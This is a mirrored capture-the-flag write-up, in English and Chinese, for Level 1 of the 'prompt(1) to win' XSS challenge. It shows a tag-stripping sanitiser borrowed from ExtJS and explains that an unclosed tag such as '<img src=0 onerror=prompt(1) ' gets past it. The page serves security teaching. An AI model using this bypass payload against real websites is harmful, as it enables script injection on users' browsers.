7
【prompt(1) to win】 Level 1 - tags stripping
source link: https://exp-blog.com/safe/ctf/prompt/level-1-tags-stripping/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
【prompt(1) to win】 Level 1
javascript
function escape(input) {
// tags stripping mechanism from ExtJS library
// Ext.util.Format.stripTags
var stripTagsRE = /<\/?[^>]+>/gi;
input = input.replace(stripTagsRE, '');
return '<article>' + input + '</article>';
}注意观察正则表达式,它会把所有匹配 <tag> 或 </tag> 的标签全部剥离。
那么不构造完整的 tag 、仅通过属性注入就可以绕过了,如这样的 payload :
<img src=0 onerror=prompt(1) (注意末尾有一个空格)
- payload.html : 下载
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK